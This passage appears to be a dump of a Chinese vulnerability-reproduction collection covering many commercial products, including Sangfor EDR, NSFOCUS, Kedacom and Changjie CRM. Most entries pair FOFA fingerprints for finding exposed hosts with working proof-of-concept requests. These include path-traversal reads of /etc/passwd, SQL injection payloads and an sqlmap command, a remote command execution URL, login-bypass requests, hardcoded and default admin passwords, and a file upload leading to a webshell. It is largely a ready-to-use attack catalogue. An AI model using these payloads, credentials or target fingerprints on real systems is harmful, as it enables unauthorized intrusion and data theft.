![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091835601.png) 26 | 27 | 28 | 29 | 其中抓包过程中发现请求的一个身份验证 Url 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091835421.png) 34 | 35 | ```plain 36 | {"role": "", "login_status": false, "result": "ok"} 37 | ``` 38 | 39 | 40 | 41 | 其中 **login_status 为 false**, 将参数使用 Burp 替换响应包为 **true** 42 | 43 | 44 | 45 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091835128.png) 46 | 47 | 请求 **/api/user/islogin** 时成功越过身份验证 48 | 49 | 50 | 51 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091836868.png) 52 | 53 | 54 | 55 | 再次访问首页验证越权漏洞 56 | 57 | 58 | 59 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091836312.png) 60 | 61 | -------------------------------------------------------------------------------- /Web应用漏洞/安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929.md: -------------------------------------------------------------------------------- 1 | # 安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929 2 | 3 | ## 漏洞描述 4 | 5 | 安徽阳光心健心理咨询有限公司心理测量平台存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 安徽阳光心健 心理测量平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="-320896955" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101955719.png) 26 | 27 | 28 | 29 | 扫描目录 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101955472.png) 34 | 35 | 36 | 37 | 访问 http://xxx.xxx.xxx.xxx/admin/ 38 | 39 | 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101955183.png) 42 | 43 | 44 | 45 | 其中 http://xxx.xxx.xxx.xxx/admin/UserFiles/ 中还包含了用户信息可未授权下载 46 | 47 | 48 | 49 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101956420.png) -------------------------------------------------------------------------------- /Web应用漏洞/宝塔 phpmyadmin未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 宝塔 phpmyadmin未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 【宝塔面板】紧急安全更新通知,Linux面板7.4.2版本/Windows面板6.8版本存在安全隐患,其他版本无此风险。已发布紧急更新,请所有使用此版本的用户务必升级到最新版,更新方法,登录面板直接升级更新即可,如更新出现问题,请登录宝塔论坛反馈或者联系客服反馈 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | Linux正式版7.4.2 11 | Linux测试版7.5.13 12 | Windows正式版6.8 13 | ``` 14 | 15 | ## 漏洞复现 16 | 17 | 访问 [**http://xxx.xxx.xxx.xxx:888/pma**](http://xxx.xxx.xxx.xxx:888/pma) 即可 18 | 19 | 20 | 21 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091838946.png) -------------------------------------------------------------------------------- /Web应用漏洞/思福迪堡垒机 任意用户登录漏洞.md: -------------------------------------------------------------------------------- 1 | # 思福迪堡垒机 任意用户登录漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任 6 | 意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。 7 | 8 | ## 漏洞影响 9 | 10 | ``` 11 | 思福迪堡垒机 12 | ``` 13 | 14 | ## FOFA 15 | 16 | ``` 17 | "Logbase运维安全管理系统" 18 | ``` 19 | 20 | ## 漏洞复现 21 | 22 | 获取INFO字段,u1参数值为⽤户名 23 | 24 | ```plain 25 | POST /bhost/set_session HTTP/1.1 26 | Host: xxx.xxx.xxx.xx 27 | u1=admin&m1= 28 | ``` 29 | 30 | 31 | 32 | 获得:**{"result":true,"info":"1562205376847","ErrMsg":""}** 33 | 34 | 35 | 36 | 带⼊INFO字段进⼊如下请求的 a0 参数值中,uCode参数值为⽤户名 37 | 38 | ```plain 39 | POST /bhost/login_link HTTP/1.1 40 | Host: xxx.xxx.xxx.xxx 41 | a0=1562205376847&a1=&a10=2019-01- 42 | 01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode= 43 | ``` 44 | 45 | 46 | 47 | 利用后即可登录后台 48 | 49 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101953637.png) -------------------------------------------------------------------------------- /Web应用漏洞/思迪数据 Home 登录绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # 思迪数据 Home 登录绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 思迪数据存在登录绕过漏洞,通过访问特殊路径即可获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 思迪数据 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "思迪数据" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101855808.png) 26 | 27 | 28 | 29 | 访问 30 | 31 | 32 | 33 | ```plain 34 | http://xxx.xxx.xxx.xxx/Home 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101855833.png) -------------------------------------------------------------------------------- /Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 昆石网络 VOS3000虚拟运营支撑系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="VOS-VOS3000" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525144202606](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251442673.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251443278.png) -------------------------------------------------------------------------------- /Web应用漏洞/智慧校园管理系统 前台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # 智慧校园管理系统 前台任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 智慧校园管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="DC_Login/QYSignUp" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下,只要存在企业用户注册就可能出现漏洞 22 | 23 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101954381.png) 24 | 25 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101954388.png) 26 | 27 | 28 | 29 | 这个地方的上传附件允许了任意文件上传,包括 aspx木马,上传后还会返回 webshell地址 30 | 31 | 32 | 33 | ![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101954847.png) 34 | 35 | ![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101954851.png) 36 | 37 | 38 | 39 | 上传的是冰蝎木马,直接连接 40 | 41 | 42 | 43 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101954772.png) -------------------------------------------------------------------------------- /Web应用漏洞/杭州法源软件 法律知识数据库系统 后台XSS漏洞.md: -------------------------------------------------------------------------------- 1 | # 杭州法源软件 法律知识数据库系统 后台XSS漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 杭州法源软件开发有限公司开发的实践教学平台系统下的法律知识数据库系统登录后台用户名处存在通用XSS漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 杭州法源软件 法律知识数据库系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="2018105215" || title="实践教学平台 - 杭州法源软件开发有限公司" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 22 | 23 | 登录后台后更改用户名,使用 td标签 闭合 24 | 25 | 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101857066.png) 28 | 29 | 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101857457.png) -------------------------------------------------------------------------------- /Web应用漏洞/极通EWEBS casmain.xgi 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 极通EWEBS casmain.xgi 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 极通EWEBS casmain.xgi 任意文件读取漏洞,攻击者通过漏洞可以读取任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 极通EWEBS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="新软科技-极通EWEBS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101939828.png) 26 | 27 | 28 | 29 | 漏洞请求包为 30 | 31 | 32 | 33 | ```plain 34 | POST /casmain.xgi HTTP/1.1 35 | Host: 36 | Content-Type: application/x-www-form-urlencoded 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 39 | Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN 40 | Content-Length: 57 41 | 42 | Language_S=../../../../windows/system32/drivers/etc/hosts 43 | ``` 44 | 45 | 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101939430.png) 48 | 49 | 50 | 51 | 可以配合 testweb.php 信息泄露读取敏感信息 52 | 53 | 54 | 55 | ```plain 56 | Language_S=../../Data/CONFIG/CasDbCnn.dat 57 | ``` -------------------------------------------------------------------------------- /Web应用漏洞/极通EWEBS testweb.php 敏感信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 极通EWEBS testweb.php 敏感信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 极通EWEBS testweb.php 存在敏感信息泄露,其中含有配置文件信息以及phpinfo信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 极通EWEBS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="新软科技-极通EWEBS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 22 | 23 | 登录页面如下 24 | 25 | 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101938494.png) 28 | 29 | 访问 testweb.php 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101939393.png) -------------------------------------------------------------------------------- /Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 汇文v5.6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="汇文软件-书目检索系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220525144642895](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251446991.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /include/config.properties 29 | ``` 30 | 31 | ![image-20220525144530183](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251445229.png) -------------------------------------------------------------------------------- /Web应用漏洞/浪潮ClusterEngineV4.0 任意用户登录漏洞.md: -------------------------------------------------------------------------------- 1 | # 浪潮ClusterEngineV4.0 任意用户登录漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 浪潮ClusterEngineV4.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="TSCEV4.0" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 22 | 23 | 登录页面如下 24 | 25 | 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091850344.png) 28 | 29 | 30 | 31 | ```plain 32 | USER: admin|pwd 33 | PASS: 任意 34 | ``` 35 | 36 | 37 | 38 | 成功登陆后台 39 | 40 | 部分功能是无法使用的 41 | 42 | 43 | 44 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091850228.png) -------------------------------------------------------------------------------- /Web应用漏洞/深信服 EDR 后台任意用户登陆漏洞.md: -------------------------------------------------------------------------------- 1 | # 深信服 EDR 后台任意用户登陆漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,登录任意用户 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | EDR <= v3.2.19 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | https://xxx.xxx.xxx.xxx/ui/login.php?user=admin 16 | 17 | 注意最后的admin需要为存在的用户名 18 | 19 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091912509.png) 20 | 21 | -------------------------------------------------------------------------------- /Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 深信服 应用交付报表系统 download.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 深信服 应用交付报表系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="SANGFOR-应用交付报表系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525144847811](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251448956.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /report/download.php?pdf=../../../../../etc/passwd 29 | ``` 30 | 31 | ![image-20220525144958637](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251449708.png) -------------------------------------------------------------------------------- /Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 深信服 应用交付管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="SANGFOR-应用交付管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145113865](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451936.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /tmp/updateme/sinfor/ad/sys/sys_user.conf 29 | ``` 30 | 31 | ![image-20220525145136819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451862.png) -------------------------------------------------------------------------------- /Web应用漏洞/深信服 日志中心 c.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 深信服 日志中心 c.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 深信服 日志中心 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 深信服 日志中心 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="isHighPerformance : !!SFIsHighPerformance," 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091915868.png) 26 | 27 | 28 | 29 | 访问漏洞Url 30 | 31 | 32 | 33 | ```plain 34 | /tool/log/c.php?strip_slashes=system&host=ipconfig 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091915736.png) -------------------------------------------------------------------------------- /Web应用漏洞/深信服 行为感知系统 c.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 深信服 行为感知系统 c.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 深信服 行为感知系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="isHighPerformance : !!SFIsHighPerformance," 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091914752.png) 26 | 27 | 28 | 29 | 访问漏洞Url 30 | 31 | 32 | 33 | ```plain 34 | /tool/log/c.php?strip_slashes=system&host=ipconfig 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091914059.png) -------------------------------------------------------------------------------- /Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 畅捷CRM get_usedspace.php SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 畅捷CRM 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="畅捷CRM" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145239822](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251452933.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)-- 29 | ``` 30 | 31 | ![image-20220525145324633](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251453704.png) 32 | 33 | 使用Sqlmap验证漏洞 34 | 35 | ``` 36 | sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id 37 | ``` -------------------------------------------------------------------------------- /Web应用漏洞/畅捷CRM 后台附件任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # 畅捷CRM 后台附件任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 畅捷CRM 后台附件存在任意文件上传漏洞,通过解析漏洞可跳过后缀更改获取网站权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 畅捷CRM 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="畅捷CRM" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101912910.png) 24 | 25 | 26 | 27 | 部分存在空密码 admin/空密码 28 | 29 | 30 | 31 | 登录后添加客户,并上传附件为PHP文件,其中文件名为 32 | 33 | 34 | 35 | xxx.xxx.php格式,越过系统中的后缀更改 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101912584.png) 40 | 41 | 42 | 43 | 点击文件名跳转 44 | 45 | 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101912465.png) -------------------------------------------------------------------------------- /Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 科达 MTS转码服务器 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | MTS转码服务器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="MTS转码服务器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145422524](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454625.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /../../../../../../../../etc/passwd 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454380.png) -------------------------------------------------------------------------------- /Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 科达 网络键盘控制台 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | KEDACOM 网络键盘控制台存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | KEDACOM 网络键盘控制台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "网络键盘控制台" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145610413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456491.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /../../../../../../../../etc/passwd 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456381.png) -------------------------------------------------------------------------------- /Web应用漏洞/科迈 RAS系统 硬编码管理员漏洞.md: -------------------------------------------------------------------------------- 1 | # 科迈 RAS系统 硬编码管理员漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 科迈 RAS系统 存在硬编码管理员漏洞,在内部自动创建了两个管理员账户,可被利用于登录 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 科迈 RAS系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="科迈-RAS系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091840562.png) 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091840042.png) 24 | 25 | 26 | 27 | 可得知存在的账号密码为 28 | 29 | 30 | 31 | ```plain 32 | user: RASCOM 33 | pass: 1A2b3C4d56. 34 | 35 | user: 1A2b3C4d56. 36 | pass: 1A2b3C4d56. 37 | ``` 38 | 39 | 40 | 41 | 当开启RDP即可使用该账号登陆 42 | 43 | -------------------------------------------------------------------------------- /Web应用漏洞/章管家 Druid未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 章管家 Druid未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 章管家 Druid存在未授权,导致信息泄露漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 章管家 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | 章管家登录-公章在外防私盖 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091905857.png) 24 | 25 | 26 | 27 | 验证页面为 **/druid/index.html** 28 | 29 | 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091905148.png) -------------------------------------------------------------------------------- /Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md: -------------------------------------------------------------------------------- 1 | # 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638 2 | 3 | ## 漏洞描述 4 | 5 | 紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 紫光电子档案管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="紫光档案管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145742607](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251457947.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251458637.png) -------------------------------------------------------------------------------- /Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 绿盟 BAS日志数据安全性分析系统存在未授权访问漏洞,通过漏洞可以添加任意账户登录平台获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 绿盟 BAS日志数据安全性分析系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="WebApi/encrypt/js-sha1/build/sha1.min.js" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525145937586](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251459725.png) 24 | 25 | 未授权页面 26 | 27 | ``` 28 | /accountmanage/index 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500626.png) 32 | 33 | 添加用户并登录 34 | 35 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500966.png) 36 | 37 | 使用账户登录后台 38 | 39 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500218.png) -------------------------------------------------------------------------------- /Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # 绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 绿盟 UTS综合威胁探针 某个接口未做授权导致未授权漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 绿盟 UTS综合威胁探针 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="NSFOCUS-UTS综合威胁探针" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 默认口令 22 | 23 | ``` 24 | admin/Nsfocus@123 25 | auditor/auditor 26 | ``` 27 | 28 | 登陆页面 29 | 30 | ![image-20220525150142447](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251501583.png) 31 | 32 | 验证POC 33 | 34 | ``` 35 | /webapi/v1/system/accountmanage/account 36 | ``` 37 | 38 | ![image-20220525150243440](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251502510.png) 39 | 40 | 这里出现了登录的账号以及加密的 PASS 41 | 42 | 登陆时的加密字段抓包修改为获取的就可以登陆系统 43 | 44 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503644.png) 45 | 46 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503926.png) -------------------------------------------------------------------------------- /Web应用漏洞/网御星云 web防护系统 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 网御星云 web防护系统 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 网御星云 web防护系统 存在信息泄露漏洞,通过访问特殊的Url获取部分敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 网御星云 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="网页防篡改系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![image-20220209200743358](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092007654.png) 26 | 27 | 28 | 29 | 访问 30 | 31 | 32 | 33 | ```plain 34 | http://xxx.xxx.xxx.xxx/API/ 35 | ``` 36 | 37 | 38 | 39 | ![image-20220209200809080](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092008160.png) 40 | 41 | 部分 API请求 不需要登录即可访问获取信息,例如 **/user/list** 42 | 43 | 44 | 45 | ![image-20220209200829973](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092008053.png) -------------------------------------------------------------------------------- /Web应用漏洞/若依管理系统 Druid未授权访问.md: -------------------------------------------------------------------------------- 1 | # 若依管理系统 Druid未授权访问 2 | 3 | ## 漏洞描述 4 | 5 | 若依管理系统使用了Druid 默认开启了匿名访问,导致未授权获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 若依管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="若依-管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 源码中看到 pom.xml 文件中查看到引用了 阿里Druid 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101956128.png) 24 | 25 | 26 | 27 | 从 issues 中发现了默认存在的未授权访问 28 | 29 | 